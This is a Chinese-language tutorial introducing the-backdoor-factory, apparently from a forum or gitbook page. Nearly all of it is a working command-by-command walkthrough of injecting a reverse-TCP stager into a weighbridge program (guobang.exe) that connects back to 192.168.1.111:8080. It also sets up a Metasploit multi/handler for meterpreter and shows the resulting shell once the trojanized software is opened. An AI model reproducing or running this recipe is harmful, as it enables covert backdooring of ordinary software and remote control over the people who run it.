工具介绍-the-backdoor-factory
原理可执行二进制文件中有大量的 00,这些 00 是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp 到代码段,来触发 payload。以项目中的过磅系统为例:
root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
//安装the-backdoor-factory
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnlYRh7H5h-1bIk%2Fbaa5f2ef8bc4b8332d377e179c2897d1.jpg?generation=1551060452382777&alt=media
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S
//检测是否支持后门植入
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnnxPf0wWxDOnLf%2F65f5db4ee779eaacdff8a20bdfd35ea8.jpg?generation=1551060446680834&alt=media
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150
//测试裂缝空间size150
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnpUH0ApLUgJIe7%2F2b8e42c3fe1195f37bf7b01fb31af21b.jpg?generation=1551060438052523&alt=media
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show
//查看可用payload
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnrdey7Kfb796h2%2Fc576aabd967bcbbf39467dcf40ec2759.jpg?generation=1551060449053503&alt=media
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded
//插入payload,并生成文件。
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqntGvelhg1wyy0N%2F1dbc7c753b5135a67db8ac3bee6f3352.jpg?generation=1551060428696462&alt=media
root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe
//对比原文件与生成文件MD5值
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnv6TkhNpnFTwb9%2F999c8d02e798b61f61a4d8cd284ffd0b.jpg?generation=1551060459847276&alt=media
root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe
//对比文件大小
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnxzQX0sIVWLXIz%2Fedd13750f6b3e03121e63e805b4a5b97.jpg?generation=1551060427458627&alt=media
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.111
lhost => 192.168.1.111
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j
//开启本地监听
https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnzy9cnLFdBVB1e%2F94330fb03737c7e42549f1b9b3a8bb21.jpg?generation=1551060430698791&alt=media
//打开软件https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqo05ZzWWs26q4qv%2F2139e4a1c0c1e326605cf246742ff3a5.jpg?generation=1551060429432002&alt=media
meterpreter > getuid
Server username: John-PC\John
页:
[1]